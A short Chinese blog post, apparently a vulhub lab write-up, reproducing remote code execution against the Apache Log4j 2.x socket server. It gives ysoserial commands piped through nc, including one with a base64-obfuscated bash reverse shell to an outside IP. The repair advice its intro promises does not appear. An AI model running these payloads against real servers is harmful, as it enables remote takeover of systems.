本文揭示了Apache Log4j 2.x版本的安全漏洞,介绍了利用ysoserial生成payload执行任意代码的方法,包括通过网盘下载payload和编码执行的示例。重点在于演示如何利用这个漏洞进行远程控制和修复建议。
Apache Log4j Server
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器,能够控制日志的输出格式与目的地。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码
思路
利用ysoserial生成payload,然后直接发送给your-ip:4712端口即可
漏洞复现
把ysoserial.jar文件放到网盘里
百度网盘密码:613a
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/test" | nc vulhub.yster.live 4712
虽然出现里奇怪的报错但还是成功执行了,也可以尝试nc
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjIyMi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" | nc vulhub.yster.live 4712
扫一扫
1796
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
